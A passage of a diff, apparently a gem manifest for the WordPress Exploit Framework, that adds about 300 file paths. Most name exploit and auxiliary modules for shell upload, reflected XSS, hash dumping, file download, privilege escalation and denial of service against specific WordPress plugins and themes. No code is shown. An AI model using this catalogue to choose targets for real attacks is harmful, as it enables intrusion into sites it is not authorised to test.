- lib/wpxf/core/options.rb
|
279
|
+
- lib/wpxf/core/opts/boolean_option.rb
|
280
|
+
- lib/wpxf/core/opts/enum_option.rb
|
281
|
+
- lib/wpxf/core/opts/integer_option.rb
|
282
|
+
- lib/wpxf/core/opts/option.rb
|
283
|
+
- lib/wpxf/core/opts/path_option.rb
|
284
|
+
- lib/wpxf/core/opts/port_option.rb
|
285
|
+
- lib/wpxf/core/opts/string_option.rb
|
286
|
+
- lib/wpxf/core/output_emitters.rb
|
287
|
+
- lib/wpxf/core/payload.rb
|
288
|
+
- lib/wpxf/db.rb
|
289
|
+
- lib/wpxf/db/credentials.rb
|
290
|
+
- lib/wpxf/db/loot.rb
|
291
|
+
- lib/wpxf/helpers/export.rb
|
292
|
+
- lib/wpxf/models/credential.rb
|
293
|
+
- lib/wpxf/models/log.rb
|
294
|
+
- lib/wpxf/models/loot_item.rb
|
295
|
+
- lib/wpxf/models/module.rb
|
296
|
+
- lib/wpxf/models/workspace.rb
|
297
|
+
- lib/wpxf/modules.rb
|
298
|
+
- lib/wpxf/modules/auxiliary/dos/load_scripts_dos.rb
|
299
|
+
- lib/wpxf/modules/auxiliary/dos/long_password_dos.rb
|
300
|
+
- lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb
|
301
|
+
- lib/wpxf/modules/auxiliary/dos/wp_v4.7.2_csrf_dos.rb
|
302
|
+
- lib/wpxf/modules/auxiliary/file_download/ad_widget_php_file_download.rb
|
303
|
+
- lib/wpxf/modules/auxiliary/file_download/all_in_one_migration_export.rb
|
304
|
+
- lib/wpxf/modules/auxiliary/file_download/antioch_arbitrary_file_download.rb
|
305
|
+
- lib/wpxf/modules/auxiliary/file_download/candidate_application_form_arbitrary_file_download.rb
|
306
|
+
- lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb
|
307
|
+
- lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb
|
308
|
+
- lib/wpxf/modules/auxiliary/file_download/duplicator_csrf_db_export.rb
|
309
|
+
- lib/wpxf/modules/auxiliary/file_download/ghost_unrestricted_export_download.rb
|
310
|
+
- lib/wpxf/modules/auxiliary/file_download/history_collection_arbitrary_file_download.rb
|
311
|
+
- lib/wpxf/modules/auxiliary/file_download/imdb_profile_widget_arbitrary_file_download.rb
|
312
|
+
- lib/wpxf/modules/auxiliary/file_download/mail_masta_unauthenticated_local_file_inclusion.rb
|
313
|
+
- lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb
|
314
|
+
- lib/wpxf/modules/auxiliary/file_download/memphis_documents_library_arbitrary_file_download.rb
|
315
|
+
- lib/wpxf/modules/auxiliary/file_download/recent_backups_arbitrary_file_download.rb
|
316
|
+
- lib/wpxf/modules/auxiliary/file_download/simple_download_monitor_file_disclosure.rb
|
317
|
+
- lib/wpxf/modules/auxiliary/file_download/simple_download_monitor_file_download.rb
|
318
|
+
- lib/wpxf/modules/auxiliary/file_download/simple_image_manipulator_arbitrary_file_download.rb
|
319
|
+
- lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb
|
320
|
+
- lib/wpxf/modules/auxiliary/file_download/wp_background_takeover_file_download.rb
|
321
|
+
- lib/wpxf/modules/auxiliary/file_download/wp_hide_security_enhancer_file_download.rb
|
322
|
+
- lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb
|
323
|
+
- lib/wpxf/modules/auxiliary/file_download/wp_vault_file_download.rb
|
324
|
+
- lib/wpxf/modules/auxiliary/file_download/wptf_image_gallery_arbitrary_file_download.rb
|
325
|
+
- lib/wpxf/modules/auxiliary/hash_dump/events_hash_dump.rb
|
326
|
+
- lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb
|
327
|
+
- lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb
|
328
|
+
- lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb
|
329
|
+
- lib/wpxf/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb
|
330
|
+
- lib/wpxf/modules/auxiliary/hash_dump/simple_events_calendar_hash_dump.rb
|
331
|
+
- lib/wpxf/modules/auxiliary/hash_dump/sql_shortcode_hash_dump.rb
|
332
|
+
- lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb
|
333
|
+
- lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb
|
334
|
+
- lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb
|
335
|
+
- lib/wpxf/modules/auxiliary/info/download_monitor_log_export.rb
|
336
|
+
- lib/wpxf/modules/auxiliary/info/email_subscribers_user_list_disclosure.rb
|
337
|
+
- lib/wpxf/modules/auxiliary/info/file_manager_database_credentials.rb
|
338
|
+
- lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb
|
339
|
+
- lib/wpxf/modules/auxiliary/info/woocommerce_email_test_order_disclosure.rb
|
340
|
+
- lib/wpxf/modules/auxiliary/info/woocommerce_order_import_export_order_disclosure.rb
|
341
|
+
- lib/wpxf/modules/auxiliary/info/wp_v4.7_user_info_disclosure.rb
|
342
|
+
- lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb
|
343
|
+
- lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb
|
344
|
+
- lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb
|
345
|
+
- lib/wpxf/modules/auxiliary/misc/wp_v4.7.1_content_injection.rb
|
346
|
+
- lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb
|
347
|
+
- lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb
|
348
|
+
- lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb
|
349
|
+
- lib/wpxf/modules/auxiliary/priv_esc/easy_cart_privilege_escalation.rb
|
350
|
+
- lib/wpxf/modules/auxiliary/priv_esc/platform_privilege_escalation.rb
|
351
|
+
- lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb
|
352
|
+
- lib/wpxf/modules/auxiliary/priv_esc/user_meta_manager_privilege_escalation.rb
|
353
|
+
- lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb
|
354
|
+
- lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb
|
355
|
+
- lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb
|
356
|
+
- lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb
|
357
|
+
- lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb
|
358
|
+
- lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb
|
359
|
+
- lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb
|
360
|
+
- lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb
|
361
|
+
- lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb
|
362
|
+
- lib/wpxf/modules/exploit/shell/acf_frontend_display_shell_upload.rb
|
363
|
+
- lib/wpxf/modules/exploit/shell/adblock_blocker_shell_upload.rb
|
364
|
+
- lib/wpxf/modules/exploit/shell/admin_shell_upload.rb
|
365
|
+
- lib/wpxf/modules/exploit/shell/aries_revslider_shell_upload.rb
|
366
|
+
- lib/wpxf/modules/exploit/shell/avada_revslider_shell_upload.rb
|
367
|
+
- lib/wpxf/modules/exploit/shell/awake_revslider_shell_upload.rb
|
368
|
+
- lib/wpxf/modules/exploit/shell/beach_apollo_revslider_shell_upload.rb
|
369
|
+
- lib/wpxf/modules/exploit/shell/bretheon_revslider_shell_upload.rb
|
370
|
+
- lib/wpxf/modules/exploit/shell/centum_revslider_shell_upload.rb
|
371
|
+
- lib/wpxf/modules/exploit/shell/charity_theme_shell_upload.rb
|
372
|
+
- lib/wpxf/modules/exploit/shell/construct_revslider_shell_upload.rb
|
373
|
+
- lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb
|
374
|
+
- lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb
|
375
|
+
- lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb
|
376
|
+
- lib/wpxf/modules/exploit/shell/divi_revslider_shell_upload.rb
|
377
|
+
- lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb
|
378
|
+
- lib/wpxf/modules/exploit/shell/echelon_revslider_shell_upload.rb
|
379
|
+
- lib/wpxf/modules/exploit/shell/elegance_revslider_shell_upload.rb
|
380
|
+
- lib/wpxf/modules/exploit/shell/estatik_v2.2.5_shell_upload.rb
|
381
|
+
- lib/wpxf/modules/exploit/shell/evo_theme_shell_upload.rb
|
382
|
+
- lib/wpxf/modules/exploit/shell/front_end_file_upload_and_manager_shell_upload.rb
|
383
|
+
- lib/wpxf/modules/exploit/shell/fusion_revslider_shell_upload.rb
|
384
|
+
- lib/wpxf/modules/exploit/shell/gallery_pro_theme_shell_upload.rb
|
385
|
+
- lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb
|
386
|
+
- lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb
|
387
|
+
- lib/wpxf/modules/exploit/shell/inboundio_marketing_shell_upload.rb
|
388
|
+
- lib/wpxf/modules/exploit/shell/incredible_wp_revslider_shell_upload.rb
|
389
|
+
- lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb
|
390
|
+
- lib/wpxf/modules/exploit/shell/mailcwp_authenticated_shell_upload.rb
|
391
|
+
- lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb
|
392
|
+
- lib/wpxf/modules/exploit/shell/mailpoet_newsletters_shell_upload.rb
|
393
|
+
- lib/wpxf/modules/exploit/shell/manbiz2_revslider_shell_upload.rb
|
394
|
+
- lib/wpxf/modules/exploit/shell/medicate_revslider_shell_upload.rb
|
395
|
+
- lib/wpxf/modules/exploit/shell/method_revslider_shell_upload.rb
|
396
|
+
- lib/wpxf/modules/exploit/shell/micro_theme_shell_upload.rb
|
397
|
+
- lib/wpxf/modules/exploit/shell/mobile_app_builder_shell_upload.rb
|
398
|
+
- lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb
|
399
|
+
- lib/wpxf/modules/exploit/shell/mobile_friendly_app_builder_shell_upload.rb
|
400
|
+
- lib/wpxf/modules/exploit/shell/modular_revslider_shell_upload.rb
|
401
|
+
- lib/wpxf/modules/exploit/shell/myriad_revslider_shell_upload.rb
|
402
|
+
- lib/wpxf/modules/exploit/shell/n_media_website_contact_form_shell_upload.rb
|
403
|
+
- lib/wpxf/modules/exploit/shell/n_media_website_contact_form_v1.9_shell_upload.rb
|
404
|
+
- lib/wpxf/modules/exploit/shell/neosense_shell_upload.rb
|
405
|
+
- lib/wpxf/modules/exploit/shell/ninja_forms_unauthenticated_shell_upload.rb
|
406
|
+
- lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb
|
407
|
+
- lib/wpxf/modules/exploit/shell/persuasion_revslider_shell_upload.rb
|
408
|
+
- lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb
|
409
|
+
- lib/wpxf/modules/exploit/shell/photo_gallery_shell_upload.rb
|
410
|
+
- lib/wpxf/modules/exploit/shell/premium_seo_pack_shell_upload.rb
|
411
|
+
- lib/wpxf/modules/exploit/shell/reflex_gallery_shell_upload.rb
|
412
|
+
- lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb
|
413
|
+
- lib/wpxf/modules/exploit/shell/seabird_revslider_shell_upload.rb
|
414
|
+
- lib/wpxf/modules/exploit/shell/showbiz_revslider_shell_upload.rb
|
415
|
+
- lib/wpxf/modules/exploit/shell/simplecart_shell_upload.rb
|
416
|
+
- lib/wpxf/modules/exploit/shell/soulmedic_revslider_shell_upload.rb
|
417
|
+
- lib/wpxf/modules/exploit/shell/striking_r_revslider_shell_upload.rb
|
418
|
+
- lib/wpxf/modules/exploit/shell/super_socializer_shell_upload.rb
|
419
|
+
- lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb
|
420
|
+
- lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb
|
421
|
+
- lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb
|
422
|
+
- lib/wpxf/modules/exploit/shell/ultimate_product_catalogue_shell_upload.rb
|
423
|
+
- lib/wpxf/modules/exploit/shell/ultimatum_revslider_shell_upload.rb
|
424
|
+
- lib/wpxf/modules/exploit/shell/userpro_shell_upload.rb
|
425
|
+
- lib/wpxf/modules/exploit/shell/webapp_builder_shell_upload.rb
|
426
|
+
- lib/wpxf/modules/exploit/shell/windows_desktop_and_iphone_photo_uploader_shell_upload.rb
|
427
|
+
- lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb
|
428
|
+
- lib/wpxf/modules/exploit/shell/woocommerce_product_addons_shell_upload.rb
|
429
|
+
- lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb
|
430
|
+
- lib/wpxf/modules/exploit/shell/wp2android_shell_upload.rb
|
431
|
+
- lib/wpxf/modules/exploit/shell/wp_front_end_repository_manager_shell_upload.rb
|
432
|
+
- lib/wpxf/modules/exploit/shell/wp_marketplace_shell_upload.rb
|
433
|
+
- lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb
|
434
|
+
- lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb
|
435
|
+
- lib/wpxf/modules/exploit/shell/wptouch_authenticated_shell_upload.rb
|
436
|
+
- lib/wpxf/modules/exploit/shell/wsecure_lite_shell_upload.rb
|
437
|
+
- lib/wpxf/modules/exploit/xss/reflected/2kb_amazon_affiliates_store_reflected_xss_shell_upload.rb
|
438
|
+
- lib/wpxf/modules/exploit/xss/reflected/admin_custom_login_reflected_xss_shell_upload.rb
|
439
|
+
- lib/wpxf/modules/exploit/xss/reflected/adsense_plugin_reflected_xss_shell_upload.rb
|
440
|
+
- lib/wpxf/modules/exploit/xss/reflected/affiliate_ads_builder_xss_shell_upload.rb
|
441
|
+
- lib/wpxf/modules/exploit/xss/reflected/affiliatewp_reflected_xss_shell_upload.rb
|
442
|
+
- lib/wpxf/modules/exploit/xss/reflected/ajax_random_post_reflected_xss_shell_upload.rb
|
443
|
+
- lib/wpxf/modules/exploit/xss/reflected/all_in_one_migration_reflected_xss_shell_upload.rb
|
444
|
+
- lib/wpxf/modules/exploit/xss/reflected/all_in_one_schema_rich_snippets_reflected_xss_shell_upload.rb
|
445
|
+
- lib/wpxf/modules/exploit/xss/reflected/all_in_one_wp_security_reflected_xss_shell_upload.rb
|
446
|
+
- lib/wpxf/modules/exploit/xss/reflected/alpine_photo_tile_for_instagram_reflected_xss_shell_upload.rb
|
447
|
+
- lib/wpxf/modules/exploit/xss/reflected/answer_my_question_reflected_xss_shell_upload.rb
|
448
|
+
- lib/wpxf/modules/exploit/xss/reflected/anti_plagiarism_reflected_xss_shell_upload.rb
|
449
|
+
- lib/wpxf/modules/exploit/xss/reflected/anyvar_reflected_xss_shell_upload.rb
|
450
|
+
- lib/wpxf/modules/exploit/xss/reflected/atahualpa_reflected_xss_shell_upload.rb
|
451
|
+
- lib/wpxf/modules/exploit/xss/reflected/backup_guard_reflected_xss_shell_upload.rb
|
452
|
+
- lib/wpxf/modules/exploit/xss/reflected/brafton_content_importer_reflected_xss_shell_upload.rb
|
453
|
+
- lib/wpxf/modules/exploit/xss/reflected/bws_featured_posts_reflected_xss_shell_upload.rb
|
454
|
+
- lib/wpxf/modules/exploit/xss/reflected/bws_google_analytics_reflected_xss_shell_upload.rb
|
455
|
+
- lib/wpxf/modules/exploit/xss/reflected/bws_google_maps_reflected_xss_shell_upload.rb
|
456
|
+
- lib/wpxf/modules/exploit/xss/reflected/bws_latest_posts_reflected_xss_shell_upload.rb
|
457
|
+
- lib/wpxf/modules/exploit/xss/reflected/bws_linkedin_reflected_xss_shell_upload.rb
|
458
|
+
- lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb
|
459
|
+
- lib/wpxf/modules/exploit/xss/reflected/bws_pinterest_reflected_xss_shell_upload.rb
|
460
|
+
- lib/wpxf/modules/exploit/xss/reflected/bws_popular_posts_reflected_xss_shell_upload.rb
|
461
|
+
- lib/wpxf/modules/exploit/xss/reflected/bws_portfolio_reflected_xss_shell_upload.rb
|
462
|
+
- lib/wpxf/modules/exploit/xss/reflected/bws_smtp_reflected_xss_shell_upload.rb
|
463
|
+
- lib/wpxf/modules/exploit/xss/reflected/bws_testimonials_reflected_xss_shell_upload.rb
|
464
|
+
- lib/wpxf/modules/exploit/xss/reflected/caldera_forms_v1.5.4_xss_shell_upload.rb
|
465
|
+
- lib/wpxf/modules/exploit/xss/reflected/captcha_reflected_xss_shell_upload.rb
|
466
|
+
- lib/wpxf/modules/exploit/xss/reflected/car_rental_reflected_xss_shell_upload.rb
|
467
|
+
- lib/wpxf/modules/exploit/xss/reflected/check_email_reflected_xss_shell_upload.rb
|
468
|
+
- lib/wpxf/modules/exploit/xss/reflected/claptastic_clap_button_reflected_xss_shell_upload.rb
|
469
|
+
- lib/wpxf/modules/exploit/xss/reflected/code_snippets_reflected_xss_shell_upload.rb
|
470
|
+
- lib/wpxf/modules/exploit/xss/reflected/colorway_reflected_xss_shell_upload.rb
|
471
|
+
- lib/wpxf/modules/exploit/xss/reflected/concours_xss_shell_upload.rb
|
472
|
+
- lib/wpxf/modules/exploit/xss/reflected/connections_reflected_xss_shell_upload.rb
|
473
|
+
- lib/wpxf/modules/exploit/xss/reflected/contact_form_multi_reflected_xss_shell_upload.rb
|
474
|
+
- lib/wpxf/modules/exploit/xss/reflected/contact_form_plugin_reflected_xss_shell_upload.rb
|
475
|
+
- lib/wpxf/modules/exploit/xss/reflected/contact_form_to_db_reflected_xss_shell_upload.rb
|
476
|
+
- lib/wpxf/modules/exploit/xss/reflected/content_grabber_reflected_xss_shell_upload.rb
|
477
|
+
- lib/wpxf/modules/exploit/xss/reflected/content_slide_reflected_xss_shell_upload.rb
|
478
|
+
- lib/wpxf/modules/exploit/xss/reflected/count_per_day_reflected_xss_shell_upload.rb
|
479
|
+
- lib/wpxf/modules/exploit/xss/reflected/csv_import_export_xss_shell_upload.rb
|
480
|
+
- lib/wpxf/modules/exploit/xss/reflected/csv_import_reflected_xss_shell_upload.rb
|
481
|
+
- lib/wpxf/modules/exploit/xss/reflected/custom_admin_page_reflected_xss_shell_upload.rb
|
482
|
+
- lib/wpxf/modules/exploit/xss/reflected/custom_fields_search_reflected_xss_shell_upload.rb
|
483
|
+
- lib/wpxf/modules/exploit/xss/reflected/custom_map_xss_shell_upload.rb
|
484
|
+
- lib/wpxf/modules/exploit/xss/reflected/custom_metas_reflected_xss_shell_upload.rb
|
485
|
+
- lib/wpxf/modules/exploit/xss/reflected/custom_permalinks_xss_shell_upload.rb
|
486
|
+
- lib/wpxf/modules/exploit/xss/reflected/custom_search_plugin_reflected_xss_shell_upload.rb
|
487
|
+
- lib/wpxf/modules/exploit/xss/reflected/defa_online_image_protector_reflected_xss_shell_upload.rb
|
488
|
+
- lib/wpxf/modules/exploit/xss/reflected/donate_button_reflected_xss_shell_upload.rb
|
489
|
+
- lib/wpxf/modules/exploit/xss/reflected/download_manager_reflected_xss_shell_upload.rb
|
490
|
+
- lib/wpxf/modules/exploit/xss/reflected/duplicator_csrf_xss_shell_upload.rb
|
491
|
+
- lib/wpxf/modules/exploit/xss/reflected/easy_contact_form_builder_reflected_xss_shell_upload.rb
|
492
|
+
- lib/wpxf/modules/exploit/xss/reflected/emag_marketplace_connector_xss_shell_upload.rb
|
493
|
+
- lib/wpxf/modules/exploit/xss/reflected/email_queue_reflected_xss_shell_upload.rb
|
494
|
+
- lib/wpxf/modules/exploit/xss/reflected/email_users_reflected_xss_shell_upload.rb
|
495
|
+
- lib/wpxf/modules/exploit/xss/reflected/enhanced_tooltip_glossary_reflected_xss_shell_upload.rb
|
496
|
+
- lib/wpxf/modules/exploit/xss/reflected/error_log_viewer_reflected_xss_shell_upload.rb
|
497
|
+
- lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb
|
498
|
+
- lib/wpxf/modules/exploit/xss/reflected/facebook_button_plugin_reflected_xss_shell_upload.rb
|
499
|
+
- lib/wpxf/modules/exploit/xss/reflected/faq_wd_reflected_xss_shell_upload.rb
|
500
|
+
- lib/wpxf/modules/exploit/xss/reflected/formbuilder_reflected_xss_shell_upload.rb
|
501
|
+
- lib/wpxf/modules/exploit/xss/reflected/gallery_categories_reflected_xss_shell_upload.rb
|
502
|
+
- lib/wpxf/modules/exploit/xss/reflected/gallery_plugin_reflected_xss_shell_upload.rb
|
503
|
+
- lib/wpxf/modules/exploit/xss/reflected/gd_rating_system_xss_shell_upload.rb
|
504
|
+
- lib/wpxf/modules/exploit/xss/reflected/google_analytics_dashboard_reflected_xss_shell_upload.rb
|
505
|
+
- lib/wpxf/modules/exploit/xss/reflected/google_captcha_reflected_xss_shell_upload.rb
|
506
|
+
- lib/wpxf/modules/exploit/xss/reflected/google_maps_reflected_xss_shell_upload.rb
|
507
|
+
- lib/wpxf/modules/exploit/xss/reflected/google_one_reflected_xss_shell_upload.rb
|
508
|
+
- lib/wpxf/modules/exploit/xss/reflected/google_shortlink_reflected_xss_shell_upload.rb
|
509
|
+
- lib/wpxf/modules/exploit/xss/reflected/google_sitemap_plugin_reflected_xss_shell_upload.rb
|
510
|
+
- lib/wpxf/modules/exploit/xss/reflected/gravity_forms_v1.9.15.11_reflected_xss_shell_upload.rb
|
511
|
+
- lib/wpxf/modules/exploit/xss/reflected/hdw_tube_reflected_xss_shell_upload.rb
|
512
|
+
- lib/wpxf/modules/exploit/xss/reflected/hero_maps_pro_reflected_xss_shell_upload.rb
|
513
|
+
- lib/wpxf/modules/exploit/xss/reflected/htaccess_reflected_xss_shell_upload.rb
|
514
|
+
- lib/wpxf/modules/exploit/xss/reflected/huge_it_image_gallery_reflected_xss_shell_upload.rb
|
515
|
+
- lib/wpxf/modules/exploit/xss/reflected/import_woocommerce_reflected_xss_shell_upload.rb
|
516
|
+
- lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb
|
517
|
+
- lib/wpxf/modules/exploit/xss/reflected/indexisto_reflected_xss_shell_upload.rb
|
518
|
+
- lib/wpxf/modules/exploit/xss/reflected/infusionsoft_reflected_xss_shell_upload.rb
|
519
|
+
- lib/wpxf/modules/exploit/xss/reflected/instagram_feed_csrf_xss_shell_upload.rb
|
520
|
+
- lib/wpxf/modules/exploit/xss/reflected/instalinker_reflected_xss_shell_upload.rb
|
521
|
+
- lib/wpxf/modules/exploit/xss/reflected/job_board_reflected_xss_shell_upload.rb
|
522
|
+
- lib/wpxf/modules/exploit/xss/reflected/job_manager_reflected_xss_shell_upload.rb
|
523
|
+
- lib/wpxf/modules/exploit/xss/reflected/leenkme_reflected_xss_shell_upload.rb
|
524
|
+
- lib/wpxf/modules/exploit/xss/reflected/lightbox_reflected_xss_shell_upload.rb
|
525
|
+
- lib/wpxf/modules/exploit/xss/reflected/limit_attempts_reflected_xss_shell_upload.rb
|
526
|
+
- lib/wpxf/modules/exploit/xss/reflected/link_library_reflected_xss_shell_upload.rb
|
527
|
+
- lib/wpxf/modules/exploit/xss/reflected/magic_fields_reflected_xss_shell_upload.rb
|
528
|
+
- lib/wpxf/modules/exploit/xss/reflected/mailchimp_for_wp_reflected_xss_shell_upload.rb
|
529
|
+
- lib/wpxf/modules/exploit/xss/reflected/mailpoet_newsletters_reflected_xss_shell_upload.rb
|
530
|
+
- lib/wpxf/modules/exploit/xss/reflected/mailpoet_newsletters_v272_reflected_xss_shell_upload.rb
|
531
|
+
- lib/wpxf/modules/exploit/xss/reflected/master_slider_reflected_xss_shell_upload.rb
|
532
|
+
- lib/wpxf/modules/exploit/xss/reflected/maxbuttons_reflected_xss_shell_upload.rb
|
533
|
+
- lib/wpxf/modules/exploit/xss/reflected/minimax_page_layout_builder_reflected_xss_shell_upload.rb
|
534
|
+
- lib/wpxf/modules/exploit/xss/reflected/msmc_redirect_after_comment_reflected_xss_shell_upload.rb
|
535
|
+
- lib/wpxf/modules/exploit/xss/reflected/multilanguage_reflected_xss_shell_upload.rb
|
536
|
+
- lib/wpxf/modules/exploit/xss/reflected/new_year_firework_reflected_xss_shell_upload.rb
|
537
|
+
- lib/wpxf/modules/exploit/xss/reflected/ninja_forms_reflected_xss_shell_upload.rb
|
538
|
+
- lib/wpxf/modules/exploit/xss/reflected/no_external_links_reflected_xss_shell_upload.rb
|
539
|
+
- lib/wpxf/modules/exploit/xss/reflected/ocim_mp3_reflected_xss_shell_upload.rb
|
540
|
+
- lib/wpxf/modules/exploit/xss/reflected/pagination_reflected_xss_shell_upload.rb
|
541
|
+
- lib/wpxf/modules/exploit/xss/reflected/pdf_print_reflected_xss_shell_upload.rb
|
542
|
+
- lib/wpxf/modules/exploit/xss/reflected/peters_login_redirect_reflected_xss_shell_upload.rb
|
543
|
+
- lib/wpxf/modules/exploit/xss/reflected/photo_gallery_xss_shell_upload.rb
|
544
|
+
- lib/wpxf/modules/exploit/xss/reflected/pinterest_feed_xss_shell_upload.rb
|
545
|
+
- lib/wpxf/modules/exploit/xss/reflected/podlove_podcast_publisher_reflected_xss_shell_upload.rb
|
546
|
+
- lib/wpxf/modules/exploit/xss/reflected/pondol_form_to_mail_reflected_xss_shell_upload.rb
|
547
|
+
- lib/wpxf/modules/exploit/xss/reflected/pootle_button_reflected_xss_shell_upload.rb
|
548
|
+
- lib/wpxf/modules/exploit/xss/reflected/popcash_integration_xss_shell_upload.rb
|
549
|
+
- lib/wpxf/modules/exploit/xss/reflected/popup_maker_reflected_xss_shell_upload.rb
|
550
|
+
- lib/wpxf/modules/exploit/xss/reflected/portfolio_reflected_xss_shell_upload.rb
|
551
|
+
- lib/wpxf/modules/exploit/xss/reflected/post_to_csv_reflected_xss_shell_upload.rb
|
552
|
+
- lib/wpxf/modules/exploit/xss/reflected/profile_builder_reflected_xss_shell_upload.rb
|
553
|
+
- lib/wpxf/modules/exploit/xss/reflected/profile_extra_fields_reflected_xss_shell_upload.rb
|
554
|
+
- lib/wpxf/modules/exploit/xss/reflected/promobar_reflected_xss_shell_upload.rb
|
555
|
+
- lib/wpxf/modules/exploit/xss/reflected/propertyhive_csrf_xss_shell_upload.rb
|
556
|
+
- lib/wpxf/modules/exploit/xss/reflected/quiz_and_survey_master_reflected_xss_shell_upload.rb
|
557
|
+
- lib/wpxf/modules/exploit/xss/reflected/quotes_and_tips_reflected_xss_shell_upload.rb
|
558
|
+
- lib/wpxf/modules/exploit/xss/reflected/quotes_collection_reflected_xss_shell_upload.rb
|
559
|
+
- lib/wpxf/modules/exploit/xss/reflected/rating_bws_reflected_xss_shell_upload.rb
|
560
|
+
- lib/wpxf/modules/exploit/xss/reflected/re_attacher_reflected_xss_shell_upload.rb
|
561
|
+
- lib/wpxf/modules/exploit/xss/reflected/realty_reflected_xss_shell_upload.rb
|
562
|
+
- lib/wpxf/modules/exploit/xss/reflected/registrationmagic_reflected_xss_shell_upload.rb
|
563
|
+
- lib/wpxf/modules/exploit/xss/reflected/relevant_reflected_xss_shell_upload.rb
|
564
|
+
- lib/wpxf/modules/exploit/xss/reflected/responsive_lightbox_reflected_xss_shell_upload.rb
|
565
|
+
- lib/wpxf/modules/exploit/xss/reflected/rockhoist_badges_reflected_xss_shell_upload.rb
|
566
|
+
- lib/wpxf/modules/exploit/xss/reflected/sender_reflected_xss_shell_upload.rb
|
567
|
+
- lib/wpxf/modules/exploit/xss/reflected/simpel_reserveren_reflected_xss_shell_upload.rb
|
568
|
+
- lib/wpxf/modules/exploit/xss/reflected/simple_slideshow_manager_reflected_xss_shell_upload.rb
|
569
|
+
- lib/wpxf/modules/exploit/xss/reflected/slideshow_gallery_reflected_xss_shell_upload.rb
|
570
|
+
- lib/wpxf/modules/exploit/xss/reflected/smart_marketing_xss_shell_upload.rb
|
571
|
+
- lib/wpxf/modules/exploit/xss/reflected/social_buttons_pack_reflected_xss_shell_upload.rb
|
572
|
+
- lib/wpxf/modules/exploit/xss/reflected/social_login_bws_reflected_xss_shell_upload.rb
|
573
|
+
- lib/wpxf/modules/exploit/xss/reflected/social_pug_reflected_xss_shell_upload.rb
|
574
|
+
- lib/wpxf/modules/exploit/xss/reflected/sp_project_document_manager_reflected_xss_shell_upload.rb
|
575
|
+
- lib/wpxf/modules/exploit/xss/reflected/spamfree_reflected_xss_shell_upload.rb
|
576
|
+
- lib/wpxf/modules/exploit/xss/reflected/spiffy_calendar_reflected_xss_shell_upload.rb
|
577
|
+
- lib/wpxf/modules/exploit/xss/reflected/splashing_images_reflected_xss_shell_upload.rb
|
578
|
+
- lib/wpxf/modules/exploit/xss/reflected/subscriber_reflected_xss_shell_upload.rb
|
579
|
+
- lib/wpxf/modules/exploit/xss/reflected/tidio_gallery_reflected_xss_shell_upload.rb
|
580
|
+
- lib/wpxf/modules/exploit/xss/reflected/timesheet_reflected_xss_shell_upload.rb
|
581
|
+
- lib/wpxf/modules/exploit/xss/reflected/tracking_code_manager_reflected_xss_shell_upload.rb
|
582
|
+
- lib/wpxf/modules/exploit/xss/reflected/tribulant_newsletter_reflected_xss_shell_upload.rb
|
583
|
+
- lib/wpxf/modules/exploit/xss/reflected/tribulant_slideshow_gallery_reflected_xss_shell_upload.rb
|
584
|
+
